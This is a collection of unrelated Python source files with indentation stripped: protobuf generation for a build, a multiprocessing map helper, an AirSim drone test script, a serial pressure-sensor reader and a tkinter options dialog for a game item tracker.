proto_dirs = [os.path.join(py_sdk_root, path) for path in BEAM_PROTO_PATHS]
proto_files = sum(
[glob.glob(os.path.join(d, '*.proto')) for d in proto_dirs], [])
out_dir = os.path.join(py_sdk_root, PYTHON_OUTPUT_PATH)
out_files = [path for path in glob.glob(os.path.join(out_dir, '*_pb2.py'))]
if out_files and not proto_files and not force:
# We have out_files but no protos; assume they're up to date.
# This is actually the common case (e.g. installation from an sdist).
log.info('No proto files; using existing generated files.')
return
elif not out_files and not proto_files:
if not os.path.exists(common):
raise RuntimeError(
'Not in apache git tree; unable to find proto definitions.')
else:
raise RuntimeError(
'No proto files found in %s.' % proto_dirs)
if force:
regenerate = 'forced'
elif not out_files:
regenerate = 'no output files'
elif len(out_files) < len(proto_files):
regenerate = 'not enough output files'
elif (
min(os.path.getmtime(path) for path in out_files)
<= max(os.path.getmtime(path)
for path in proto_files + [os.path.realpath(__file__)])):
regenerate = 'output files are out-of-date'
elif len(out_files) > len(proto_files):
regenerate = 'output files without corresponding .proto files'
# too many output files: probably due to switching between git branches.
# remove them so they don't trigger constant regeneration.
for out_file in out_files:
os.remove(out_file)
else:
regenerate = None
if regenerate:
try:
from grpc_tools import protoc
except ImportError:
if platform.system() == 'Windows':
# For Windows, grpcio-tools has to be installed manually.
raise RuntimeError(
'Cannot generate protos for Windows since grpcio-tools package is '
'not installed. Please install this package manually '
'using \'pip install grpcio-tools\'.')
# Use a subprocess to avoid messing with this process' path and imports.
# Note that this requires a separate module from setup.py for Windows:
# https://docs.python.org/2/library/multiprocessing.html#windows
p = multiprocessing.Process(
target=_install_grpcio_tools_and_generate_proto_files)
p.start()
p.join()
if p.exitcode:
raise ValueError("Proto generation failed (see log for details).")
else:
log.info('Regenerating Python proto definitions (%s).' % regenerate)
builtin_protos = pkg_resources.resource_filename('grpc_tools', '_proto')
args = (
[sys.executable] + # expecting to be called from command line
['--proto_path=%s' % builtin_protos] +
['--proto_path=%s' % d for d in proto_dirs] +
['--python_out=%s' % out_dir] +
# TODO(robertwb): Remove the prefix once it's the default.
['--grpc_python_out=grpc_2_0:%s' % out_dir] +
proto_files)
ret_code = protoc.main(args)
if ret_code:
raise RuntimeError(
'Protoc returned non-zero status (see logs for details): '
'%s' % ret_code)
# copy resource files
for path in MODEL_RESOURCES:
shutil.copy2(os.path.join(py_sdk_root, path), out_dir)
ret_code = subprocess.call(["pip", "install", "future==0.16.0"])
if ret_code:
raise RuntimeError(
'Error installing future during proto generation')
ret_code = subprocess.call(
["futurize", "--both-stages", "--write", "--no-diff", out_dir])
if ret_code:
raise RuntimeError(
'Error applying futurize to generated protobuf python files.')
# Though wheels are available for grpcio-tools, setup_requires uses
# easy_install which doesn't understand them. This means that it is
# compiled from scratch (which is expensive as it compiles the full
# protoc compiler). Instead, we attempt to install a wheel in a temporary
# directory and add it to the path as needed.
# See https://github.com/pypa/setuptools/issues/377
def _install_grpcio_tools_and_generate_proto_files():
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
install_path = os.path.join(py_sdk_root, '.eggs', 'grpcio-wheels')
build_path = install_path + '-build'
if os.path.exists(build_path):
shutil.rmtree(build_path)
logging.warning('Installing grpcio-tools into %s', install_path)
try:
start = time.time()
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install',
'--target', install_path, '--build', build_path,
'--upgrade',
'-r', os.path.join(py_sdk_root, 'build-requirements.txt')])
logging.warning(
'Installing grpcio-tools took %0.2f seconds.', time.time() - start)
finally:
sys.stderr.flush()
shutil.rmtree(build_path, ignore_errors=True)
sys.path.append(install_path)
try:
generate_proto_files()
finally:
sys.stderr.flush()
if __name__ == '__main__':
generate_proto_files(force=True)
|
multiprocessing_tools.py
|
import multiprocessing
def fun(f, q_in, q_out):
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs=multiprocessing.cpu_count()):
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=fun, args=(f, q_in, q_out))
for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i, x in sorted(res)]
|
multirotor_autonomous.py
|
"""
For connecting to the AirSim drone environment and testing API functionality
And to learn how to control the drone
"""
import setup_path
import airsim
import numpy as np
import os
import tempfile
import pprint
import json
import cv2
import sys
import time
import threading
# connect to the AirSim simulator
client = airsim.MultirotorClient(ip="127.0.0.1")
client.confirmConnection()
client.enableApiControl(True)
client.armDisarm(True)
state = client.getMultirotorState()
position_global_ref = state.gps_location #gps location where the multirotor takes off
# airsim.wait_key('Press any key to takeoff')
# client.takeoffAsync().join()
client.moveToPositionAsync(0, 0, -10, 5).join()
state = client.getMultirotorState()
position_local = state.kinematics_estimated.position
print("state: %s" % pprint.pformat(position_local))
position_local = state.kinematics_estimated.position
attitude_q = state.kinematics_estimated.orientation #四元数
position_global = state.gps_location
mutex = threading.Lock()
def showImages():
global mutex, client
cameraType = "scene"
cameraTypeMap = {
"depth": airsim.ImageType.DepthVis,
"segmentation": airsim.ImageType.Segmentation,
"seg": airsim.ImageType.Segmentation,
"scene": airsim.ImageType.Scene,
"disparity": airsim.ImageType.DisparityNormalized,
"normals": airsim.ImageType.SurfaceNormals
}
print (cameraTypeMap[cameraType])
help = False
fontFace = cv2.FONT_HERSHEY_SIMPLEX
fontScale = 0.5
thickness = 2
textSize, baseline = cv2.getTextSize("FPS", fontFace, fontScale, thickness)
print (textSize)
textOrg = (10, 10 + textSize[1])
frameCount = 0
startTime=time.clock()
fps = 0
i = 0
while True:
#client.moveByVelocityAsync(1,0,0,100) #.join()等待程序执行完毕,不加则不等待
# because this method returns std::vector<uint8>, msgpack decides to encode it as a string unfortunately.
if mutex.acquire():
rawImage = client.simGetImage("0", cameraTypeMap[cameraType])
mutex.release()
if (rawImage == None):
print("Camera is not returning image, please check airsim for error messages")
sys.exit(0)
else:
png = cv2.imdecode(airsim.string_to_uint8_array(rawImage), cv2.IMREAD_UNCHANGED)
cv2.putText(png,'FPS ' + str(fps),textOrg, fontFace, fontScale,(255,0,255),thickness)
cv2.imshow("Scene", png)
frameCount = frameCount + 1
endTime=time.clock()
diff = endTime - startTime
if (diff > 1):
fps = frameCount
frameCount = 0
startTime = endTime
time.sleep(0.01)
key = cv2.waitKey(1) & 0xFF;
if (key == 27 or key == ord('q') or key == ord('x')):
break
def moveDrone():
global mutex, client
while True:
if mutex.acquire():
client.moveByVelocityAsync(3,0,0,5)
mutex.release()
time.sleep(0.01)
key = cv2.waitKey(1) & 0xFF;
if (key == 27 or key == ord('q') or key == ord('x')):
break
threads = []
t1 = threading.Thread(target=moveDrone)
threads.append(t1)
t2 = threading.Thread(target=showImages)
threads.append(t2)
if __name__ == '__main__':
#airsim.wait_key('Press any key to reset to original state')
for t in threads:
t.setDaemon(True)
t.start()
t.join()
client.armDisarm(False)
client.reset()
# that's enough fun for now. let's quit cleanly
client.enableApiControl(False)
|
softskin.py
|
import serial
import serial.tools.list_ports
import numpy as np
import math
import threading
import re
import os
import sys
import time
import matplotlib.pyplot as plt
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
data_path = os.path.abspath(
os.path.dirname(os.path.abspath(__file__)) + os.path.sep + ".." +
os.path.sep + "data")
def print_serial(port):
print("---------------[ %s ]---------------" % port.name)
print("Path: %s" % port.device)
print("Descript: %s" % port.description)
print("HWID: %s" % port.hwid)
if not None == port.manufacturer:
print("Manufacture: %s" % port.manufacturer)
if not None == port.product:
print("Product: %s" % port.product)
if not None == port.interface:
print("Interface: %s" % port.interface)
print()
def detect_serials(location="1-1.1:1.0", vid=0x10c4, pid=0xea60):
ports = serial.tools.list_ports.comports()
for port in ports:
print_serial(port)
if port.location.__contains__(location):
port_path = port.device
return port_path
else:
print("Cannot find the target device: %s" % location)
return None
class SoftSkin(object):
def __init__(self):
port_name = detect_serials() # Arduino Mega 2560 ttyACM0
baud_rate = 115200
print(port_name, baud_rate)
self.pwd = os.path.abspath(os.path.abspath(__file__))
self.father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
self.serial = serial.Serial(port_name, baud_rate, timeout=None)
self.raw_data = [] # 保存一帧数据
self.base_data = [] # 建立一组基准值用于初始化
self.temp_data = []
self.port_num = 32
self.average_length = 10
self.average_buffer = np.zeros((self.average_length,self.port_num))
self.max_pressure = 0
self.build_base_line_data()
pass
def read_data(self, is_shown=1):
try:
one_line_data = self.serial.readline().decode("utf-8")
# print(one_line_data)
one_line_data = one_line_data.strip('SS')
one_line_data = one_line_data.strip('\n')
one_line_data = one_line_data.strip('\r')
one_line_data = one_line_data.split('|')
# print(one_line_data)
if is_shown == 1:
print(one_line_data)
if len(one_line_data) == self.port_num:
one_line_data = list(map(float, one_line_data))
one_line_data = list(map(int, one_line_data))
self.raw_data = one_line_data
# print(self.raw_data, type(self.raw_data), type(self.raw_data[0]))
except BaseException as be:
print("Data Error:", be)
def build_base_line_data(self, initial_size=20):
"""
1.建立一组基准数值
检测异常值
取平均值
:return:
"""
base_list = []
for i in range(initial_size):
# time.sleep(0.01)
# self.serial.flushInput()
self.read_data(0)
if len(self.raw_data) == self.port_num:
# print(self.raw_data)
temp_raw_data = self.raw_data
base_list += temp_raw_data
mean_base_list = np.array(base_list).reshape([-1, self.port_num])
add_col = np.ones(mean_base_list.shape[0]).reshape([1, -1])
mean_base_list = add_col.dot(mean_base_list) / mean_base_list.shape[0]
self.base_data = mean_base_list.tolist()[0]
# print(self.base_data)
self.base_data = list(map(lambda x: int(x) - 1, self.base_data))
# print(self.base_data, type(self.base_data))
print("base line data: ", self.base_data)
pass
def read_and_record(self, record=False, show=False, plot=False, plot_num=30,):
file_path = data_path + os.path.sep + "Softskin.txt"
plot_array = np.zeros((plot_num, self.port_num))
if record:
file = open(file_path, 'w')
while True:
try:
# self.serial.flushInput()
self.read_data(0)
if len(self.raw_data) == len(self.base_data):
temp_data = np.array(self.raw_data) - np.array(self.base_data)
if show:
print(temp_data)
print(self.max_pressure)
if record:
time_index = time.time()
write_data = temp_data.tolist()
write_data.insert(0, time_index)
file.write(str(write_data) + '\n')
file.flush()
self.temp_data = temp_data
self.max_pressure = max(self.temp_data)
time.sleep(0.1)
if plot:
# plt.ion()
plot_array[0:plot_num - 1, :] = plot_array[1:plot_num, :]
plot_array[plot_num - 1, :] = np.array(temp_data)
plt.clf()
plt.xlabel('Time')
plt.ylabel('pressure')
plt.ylim((-10, 270))
plt.plot(range(0, plot_num), plot_array)
# plt.ioff()
# plt.show()
# plt.draw()
plt.pause(0.0000000001)
except BaseException as be:
print("Data Error:", be)
if __name__ == '__main__':
from Driver import ControlOdometryDriver as CD
softskin = SoftSkin()
softskin.build_base_line_data()
# while True:
# softskin.read_data(0)
# print(np.array(softskin.raw_data) - np.array(softskin.base_data))
def little_test(sk:SoftSkin, driver:CD.ControlDriver):
while True:
# print(sk.max_pressure)
# if sk.max_pressure>=70:
# driver.speed = 0
# time.sleep(5)
# driver.speed = 0.3
# time.sleep(0.5)
driver.speed = 0.3
time.sleep(3)
driver.speed = 0
time.sleep(3)
driver = CD.ControlDriver(left_right=0)
thread_test = threading.Thread(target=little_test,args=(softskin,driver,))
thread_test.start()
# driver.start()
softskin.read_and_record(show=True, record=True,plot=False)
# softskin.record_label()
|
option_picker.py
|
import traceback
from tkinter import *
from multiprocessing import Queue
from tkinter.colorchooser import askcolor
import json
import re
import tkinter.ttk
import pygame.sysfont
from options import Options
import logging
import urllib.request, urllib.error, urllib.parse
import webbrowser
import platform
import threading
from error_stuff import log_error
class OptionsMenu(object):
"""
These are the standard save and load options functions.
"""
def __init__(self):
self.options = Options()
self.root = Tk()
self.root.destroy()
# Our 'safe' list of fonts that should work in pygame
self.fonts = ['Andalus', 'Angsana New', 'AngsanaUPC', 'Arial', 'Arial Black', 'Browallia New', 'BrowalliaUPC',
'Comic Sans MS', 'Cordia New', 'CordiaUPC', 'Courier New', 'DFKai-SB', 'David', 'DilleniaUPC',
'Estrangelo Edessa', 'FrankRuehl', 'Franklin Gothic Medium', 'Gautami', 'Georgia', 'Impact',
'IrisUPC', 'JasmineUPC', 'KodchiangUPC', 'Latha', 'LilyUPC', 'Lucida Console', 'MV Boli',
'Mangal', 'Microsoft Sans Serif', 'Miriam', 'Miriam Fixed', 'Narkisim', 'Raavi', 'Rod', 'Shruti',
'SimHei', 'Simplified Arabic', 'Simplified Arabic Fixed', 'Sylfaen', 'Tahoma', 'Times New Roman',
'Traditional Arabic', 'Trebuchet MS', 'Tunga', 'Verdana']
self.game_versions = ['Rebirth', 'Afterbirth', 'Afterbirth+', 'Repentance', 'Antibirth']
self.network_queue = Queue()
# Check if the system has the fonts installed, and remove them from the list if it doesn't
try:
valid_pygame_fonts = [str.lower(x.replace(" ", "")) for x in self.fonts]
system_fonts = pygame.sysfont.get_fonts()
to_delete = []
for index, font in enumerate(valid_pygame_fonts):
if font not in system_fonts:
to_delete += [index]
for index in to_delete[::-1]:
del self.fonts[index]
except:
log_error("There may have been an error detecting system fonts.\n" + traceback.print_exc())
pretty_name_map = {"read_from_server": "Watch Someone Else",
"write_to_server": "Let Others Watch Me",
"twitch_name": "Their Twitch Name",
"bold_font": "Bold",
"blck_cndl_mode": "BLCK CNDL Mode",
"custom_title_enabled": "Change Window Title",
"log_file_check_seconds": "Check log file every",
"show_jacob_esau_items": "Show Jacob&Esau Icons"}
label_after_text = {"message_duration":"second(s)",
"framerate_limit":"fps",
"log_file_check_seconds": "second(s)"}
connection_labels = {"starting":"Connecting to server for player list...",
"done": "Connecting to server for player list... Done",
"fail": "Connecting to server for player list... Failed"}
def pretty_name(self, s):
# Change from a var name to something you'd show the users
if s in self.pretty_name_map:
return self.pretty_name_map.get(s)
return " ".join(s.split("_")).title()
def color_callback(self, source):
# Prompt a color picker, set the options and the background/foreground of the button
nums, hex_color = askcolor(color=getattr(self.options, source), title="Color Chooser")
if hex_color:
opposite = self.opposite_color(hex_color)
setattr(self.options, source, hex_color.upper())
self.buttons[source].configure(bg=hex_color, fg=opposite)
def checkbox_callback(self):
# Just for the "show decription" checkbox -- to disable the message duration entry
if not self.checks.get("show_description").get():
self.entries["message_duration"].configure(state=DISABLED)
else:
self.entries["message_duration"].configure(state=NORMAL)
# Disable custom message if we don't have to show it
if not self.checks.get("show_status_message").get():
self.entries["status_message"].configure(state=DISABLED)
else:
self.entries["status_message"].configure(state=NORMAL)
# Just for the "Custom Title Enabled" checkbox -- to disable the "Custom Title" entry
if not self.checks.get("custom_title_enabled").get():
self.entries["custom_title"].configure(state=DISABLED)
else:
self.entries["custom_title"].configure(state=NORMAL)
# Writing to server occurs when state changes, so enable read delay if we are reading
if self.checks.get("read_from_server").get():
self.entries["read_delay"].grid()
self.entries["twitch_name"].grid()
self.labels["read_delay"].grid()
self.labels["twitch_name"].grid()
else:
self.entries["read_delay"].grid_remove()
self.entries["twitch_name"].grid_remove()
self.labels["read_delay"].grid_remove()
self.labels["twitch_name"].grid_remove()
self.labels["server_connect_label"].config(text="")
if self.checks.get("change_server").get():
self.entries["trackerserver_url"].grid()
self.labels["trackerserver_url"].grid()
else:
self.entries["trackerserver_url"].grid_remove()
self.labels["trackerserver_url"].grid_remove()
# Disable authkey if we don't write to server
if self.checks.get("write_to_server").get():
self.entries["trackerserver_authkey"].grid()
self.labels["trackerserver_authkey"].grid()
self.buttons["authkey_button"].grid()
else:
self.entries["trackerserver_authkey"].grid_remove()
self.labels["trackerserver_authkey"].grid_remove()
self.buttons["authkey_button"].grid_remove()
def read_callback(self):
if self.checks.get("read_from_server").get():
self.checks.get("write_to_server").set(0)
self.labels["server_connect_label"].config(text=self.connection_labels["starting"])
t = threading.Thread(target=self.get_server_userlist_and_enqueue)
t.start()
self.checkbox_callback()
def write_callback(self):
if self.checks.get("write_to_server").get():
self.checks.get("read_from_server").set(0)
self.checkbox_callback()
def save_callback(self):
# Callback for the "save" option -- rejiggers options and saves to options.json, then quits
for key, value in self.entries.items():
if key in self.integer_keys:
# Cast this as a float first to avoid errors if the user puts a value of 1.0 in an options, for example
setattr(self.options, key, int(float(value.get())))
elif key in self.float_keys:
val = float(value.get())
setattr(self.options, key, val)
elif hasattr(value, "get"):
setattr(self.options, key, value.get())
for key, value in self.checks.items():
setattr(self.options, key, True if value.get() else False)
self.root.destroy()
def seconds_to_text(self, seconds):
if seconds < 60:
return str(seconds) + " second" + ("s" if seconds > 1 else "")
minutes = seconds / 60
if minutes < 60:
return str(minutes) + " minute" + ("s" if minutes > 1 else "")
hours = minutes / 60
if hours < 24:
return str(hours) + " hour" + ("s" if hours > 1 else "")
days = hours / 24
return str(days) + " day" + ("s" if days > 1 else "")
def get_server_userlist_and_enqueue(self):
try:
url = self.entries['trackerserver_url'].get() + "/tracker/api/userlist/"
json_state = urllib.request.urlopen(url).read()
users = json.loads(json_state)
success = True
except Exception:
log_error("Problem getting userlist from tracker server\n" + traceback.format_exc())
users = []
success = False
network_result = {"users": users, "success": success}
self.network_queue.put(network_result)
def get_server_twitch_client_id(self):
try:
url = self.entries['trackerserver_url'].get() + "/tracker/api/twitchclientid/"
return urllib.request.urlopen(url).read()
except Exception:
log_error("Couldn't get twitch client id from tracker server\n" + traceback.format_exc())
return None
def process_network_results(self):
# OSX qSize is not emplemented use empty rather.
while not self.network_queue.empty():
try:
network_result = self.network_queue.get(0)
users_combobox_list = []
for user in network_result["users"]:
formatted_time_ago = self.seconds_to_text(user["seconds"])
list_entry = user["name"] + " (updated " + formatted_time_ago + " ago)"
users_combobox_list.append(list_entry)
self.entries['twitch_name']['values'] = users_combobox_list
label = "done" if network_result["success"] else "fail"
self.labels["server_connect_label"].config(text=self.connection_labels[label])
except Queue.Empty:
pass
self.root.after(100, self.process_network_results)
def trim_name(self, event):
name = self.entries['twitch_name'].get()
name = name.partition(" (")[0]
self.entries['twitch_name'].set(name)
# From: http://code.activestate.com/recipes/527747-invert-css-hex-colors/
def opposite_color(self, color):
# Get the opposite color of a hex color, just to make text on buttons readable
color = color.lower()
table = str.maketrans('0123456789abcdef', 'fedcba9876543210')
return str(color).translate(table).upper()
# From: http://stackoverflow.com/questions/4140437/interactively-validating-entry-widget-content-in-tkinter
def ValidateNumeric(self, d, i, P, s, S, v, V, W):
# This validation is a biiit janky, just some crazy regex that checks P (value of entry after modification)
return P == "" or re.search("^\d+(\.\d*)?$", P) is not None
def run(self):
# Create root
self.root = Tk()
self.root.attributes("-topmost", True)
self.root.wm_title("Item Tracker Options")
self.root.resizable(False, False)
if platform.system() == "Darwin":
self.root.iconbitmap('options.ico')
elif platform.system() == "Linux":
self.root.iconbitmap('@options.xbm')
else:
self.root.iconbitmap(default = 'options.ico')
# Generate numeric options by looping over option types
self.integer_keys = ["message_duration", "framerate_limit", "read_delay"]
self.float_keys = ["size_multiplier", "log_file_check_seconds"]
self.entries = {}
self.labels = {}
self.checks = {}
self.buttons = {}
# Draw the "Text Options" box
text_options_frame = LabelFrame(self.root, text="Text Options", padx=40, pady=20)
text_options_frame.grid(row=0, column=0, padx=5, pady=2)
validate_numeric_field = (self.root.register(self.ValidateNumeric), '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')
next_row = 0
for index, opt in enumerate(["message_duration"]):
Label(text_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
self.entries[opt] = Entry(text_options_frame, validate="key", validatecommand=validate_numeric_field)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
if opt in self.label_after_text:
Label(text_options_frame, text=self.label_after_text[opt]).grid(row=next_row, column=2)
next_row += 1
for index, opt in enumerate(["show_font"]):
Label(text_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
initialfont = StringVar()
initialfont.set(getattr(self.options, opt))
self.entries[opt] = tkinter.ttk.Combobox(text_options_frame, values=sorted(self.fonts), textvariable=initialfont, state='readonly')
self.entries[opt].grid(row=next_row, column=1)
for index, opt in enumerate(["bold_font"]):
self.checks[opt] = IntVar()
c = Checkbutton(text_options_frame, text=self.pretty_name(opt), variable=self.checks[opt])
c.grid(row=next_row, column=2)
next_row += 1
if getattr(self.options, opt):
c.select()
for index, opt in enumerate(["status_message"]):
Label(text_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
self.entries[opt] = Entry(text_options_frame)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
next_row += 1
text_checkboxes = ["show_description", "show_status_message", "word_wrap"]
for index, opt in enumerate(text_checkboxes):
self.checks[opt] = IntVar()
c = Checkbutton(text_options_frame, text=self.pretty_name(opt), variable=self.checks[opt])
c.grid(row=int(len(text_checkboxes) + 1 + index / 2), column=index % 2) # 2 checkboxes per row
if getattr(self.options, opt):
c.select()
# Disable letting the user set the message duration if the show description option is disabled
if opt == "show_description" or opt == "show_status_message":
c.configure(command=self.checkbox_callback)
# Draw the other options box
display_options_frame = LabelFrame(self.root, text="", padx=22, pady=20)
display_options_frame.grid(row=1, column=0, padx=5, pady=2)
next_row = 0
for index, opt in enumerate(["game_version"]):
Label(display_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
initialversion = StringVar()
initialversion.set(getattr(self.options, opt))
self.entries[opt] = tkinter.ttk.Combobox(display_options_frame, values=self.game_versions, textvariable=initialversion, state='readonly')
self.entries[opt].grid(row=next_row, column=1)
next_row += 1
for index, opt in enumerate(["framerate_limit", "log_file_check_seconds", "size_multiplier"]):
Label(display_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
self.entries[opt] = Entry(display_options_frame, validate="key", validatecommand=validate_numeric_field)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
if opt in self.label_after_text:
Label(display_options_frame, text=self.label_after_text[opt]).grid(row=next_row, column=2)
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["item_details_link"]):
Label(display_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
self.entries[opt] = Entry(display_options_frame)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
next_row += 1
# Generate buttons by looping over option types
for index, opt in enumerate(["background_color", "text_color"]):
self.buttons[opt] = Button(
display_options_frame,
text=self.pretty_name(opt),
bg=getattr(self.options, opt),
fg=self.opposite_color(getattr(self.options, opt)),
command=lambda opt=opt: self.color_callback(opt)
)
self.buttons[opt].grid(row=len(self.entries), column=index)
# Generate checkboxes, with special exception for show_description for message duration
for index, opt in enumerate(
["show_jacob_esau_items", "show_item_ids", "enable_mouseover", "show_floors", "show_rerolled_items", "show_health_ups",
"show_space_items", "show_blind_icon", "make_items_glow", "blck_cndl_mode",
"check_for_updates", "custom_title_enabled"]):
self.checks[opt] = IntVar()
c = Checkbutton(display_options_frame, text=self.pretty_name(opt), variable=self.checks[opt])
c.grid(row=int(len(self.entries) + 1 + index / 2), column=index % 2) # 2 checkboxes per row
if getattr(self.options, opt):
c.select()
if opt == "custom_title_enabled":
c.configure(command=self.checkbox_callback)
next_row += int(len(self.entries) / 2 + 1)
# Generate label for custom title
Label(display_options_frame, text=self.pretty_name("custom_title")).grid(row=next_row)
self.entries["custom_title"] = Entry(display_options_frame)
self.entries["custom_title"].grid(row=next_row, column=1)
self.entries["custom_title"].insert(0, getattr(self.options, "custom_title"))
next_row += 1
# Draw the "Tournament Settings" box
tournament_settings_frame = LabelFrame(self.root, text="Tournament Settings", padx=19, pady=20)
tournament_settings_frame.grid(row=0, column=1, rowspan=2, sticky=N, pady=2)
next_row = 0
for index, opt in enumerate(["change_server"]):
self.checks[opt] = IntVar()
c = Checkbutton(tournament_settings_frame, text=self.pretty_name(opt), variable=self.checks[opt], indicatoron=False)
c.grid(row=next_row, column=0, pady=2)
c.configure(command=self.checkbox_callback)
if getattr(self.options, opt, False):
c.select()
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["trackerserver_url"]):
self.labels[opt] = Label(tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = Entry(tournament_settings_frame)
self.entries[opt].grid(row=next_row, column=1, pady=2)
self.entries[opt].insert(0, getattr(self.options, opt, ""))
next_row += 1
paddings = {"read_from_server": 5, "write_to_server": 120}
callbacks = {"read_from_server":self.read_callback, "write_to_server":self.write_callback}
for index, opt in enumerate(["read_from_server", "write_to_server"]):
self.checks[opt] = IntVar()
c = Checkbutton(tournament_settings_frame, text=self.pretty_name(opt), variable=self.checks[opt], indicatoron=False)
c.grid(row=next_row, column=index, pady=2, padx=paddings[opt])
c.configure(command=callbacks[opt])
if getattr(self.options, opt, False):
c.select()
next_row += 1
for index, opt in enumerate(["server_connect_label"]):
self.labels[opt] = Label(self.root, text="", width=len(self.connection_labels["fail"]))
self.labels[opt].grid(row=next_row, pady=2, columnspan=2, in_=tournament_settings_frame)
next_row += 1
for index, opt in enumerate(["twitch_name"]):
self.labels[opt] = Label(tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = tkinter.ttk.Combobox(tournament_settings_frame, width=40)
self.entries[opt].set(getattr(self.options, opt, ""))
self.entries[opt].bind("<<ComboboxSelected>>", self.trim_name)
self.entries[opt].grid(row=next_row, column=1)
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["read_delay", "trackerserver_authkey"]):
self.labels[opt] = Label(tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = Entry(tournament_settings_frame)
self.entries[opt].grid(row=next_row, column=1, pady=2)
self.entries[opt].insert(0, getattr(self.options, opt, ""))
next_row += 1
def authkey_fn():
self.entries["trackerserver_authkey"].delete(0, last=END)
twitch_client_id = self.get_server_twitch_client_id()
if twitch_client_id is not None:
webbrowser.open("https://api.twitch.tv/kraken/oauth2/authorize?response_type=token&client_id=" + twitch_client_id.decode('utf-8') + "&redirect_uri=" + self.entries['trackerserver_url'].get() + "/tracker/setup&scope=", autoraise=True)
else:
# TODO: show an error
pass
self.buttons["authkey_button"] = Button(
tournament_settings_frame,
text="Get an authkey",
command=authkey_fn
)
self.buttons["authkey_button"].grid(row=next_row, column=1, pady=5)
# Draw the "Transparent Mode" box
transparent_mode_frame = LabelFrame(self.root, text="Transparent Mode", padx=25, pady=9)
transparent_mode_frame.grid(row=1, column=1, pady=2, sticky=S)
transparent_mode_frame.grid_location(200,200)
if platform.system() == "Windows":
text = Label(transparent_mode_frame, text="The tracker will always be on top of other windows, except when the game is in fullscreen.\n\nYou can't resize/move/minimize/close the window, you have to be in non-transparent\nmode. Middle-click on the tracker to switch modes.\n\nThe background color will always be #2C2C00 (RGB(44, 44, 0)) because of performance\nand readability reasons. You can use this color to setup a chromakey in streaming\nsoftwares, setting the similarity and smoothness at minimum.\n\nThe \"Make Items Glow\" option is also disabled for readability reasons.")
text.pack()
for index, opt in enumerate(["transparent_mode"]):
self.checks[opt] = IntVar()
c = Checkbutton(transparent_mode_frame, text=self.pretty_name(opt), variable=self.checks[opt])
c.pack()
if getattr(self.options, opt):
c.select()
else:
text = Label(transparent_mode_frame, text="This only works on Windows for the moment.\nIf you have a solution for it, fork the repository on GitHub,\nmake a feature and do a Pull Request")
text.pack()
# Check for coherency in options with priority to read
self.read_callback()
# Disable some textboxes if needed
self.checkbox_callback()
button_save_frame = LabelFrame(self.root, bd=0, pady=5)
button_save_frame.grid(row=2, column=0, sticky="e")
button_cancel_frame = LabelFrame(self.root, bd=0, pady=5)
button_cancel_frame.grid(row=2, column=1, sticky="w")
# Save and cancel buttons
save = Button(
button_save_frame,
text="Save",
command=self.save_callback
)
save.grid(row=0, column=0, padx=2)
cancel = Button(
button_cancel_frame,
text="Cancel",
command=self.root.destroy
)
cancel.grid(row=0, column=0, padx=2)
# We're going to jump through a lot of hoops so we can position the options window on top of the tracker...
# ... WITHOUT going off the edge of the screen
# First we start out placing ourselves at the tracker's position
x_pos = getattr(self.options, "x_position")
y_pos = getattr(self.options, "y_position")
# Now we make ourselves invisible and fullscreen (this is a hack to measure the size and position of the monitor)
# We can't use the "screenwidth" and "screenheight" functions because they only give info on the primary display!
self.root.geometry('+%d+%d' % (x_pos, y_pos))
self.root.attributes("-alpha", 00)
if platform.system() == "Windows":
self.root.state("zoomed")
self.root.update()
else:
if platform.system() != "Darwin":
# todo: figure out how to do this on mac. Right now this hacky logic to avoid going
# off the edge of the screen is doing who-knows-what when run on a mac.
self.root.attributes("-fullscreen", True)
# For some reason using 'update' here affects the actual window height we want to get later
self.root.update_idletasks()
# Our current width and height are now our display's width and height
screen_width = self.root.winfo_width()
screen_height = self.root.winfo_height()
# Get the upper left corner of the monitor
origin_x = self.root.winfo_x()
origin_y = self.root.winfo_y()
# Now we get out of invisible fullscreen mode
self.root.attributes("-alpha", 0xFF)
if platform.system() == "Windows":
self.root.state("normal")
else:
if platform.system() != "Darwin":
self.root.attributes("-fullscreen", False) # todo: figure out how to do this on mac
self.root.update()
# Here's the actual size of the window we're drawing
window_width = self.root.winfo_width()
window_height = self.root.winfo_height()
# Now we can make sure we don't go off the sides
max_x = origin_x + screen_width - window_width - 50
max_y = origin_y + screen_height - window_height - 50
x_pos = min(x_pos, max_x)
y_pos = min(y_pos, max_y)
# Clamp origin after clamping the other side, so that if our window is too big we lose the bottom/right instead of top/left
x_pos = max(x_pos, origin_x)
y_pos = max(y_pos, origin_y)
self.root.geometry('+%d+%d' % (x_pos, y_pos))
self.root.update()
self.root.focus_force()
# We're polling this queue for network results 10 times per second. This avoids blocking the main thread when we talk to the server
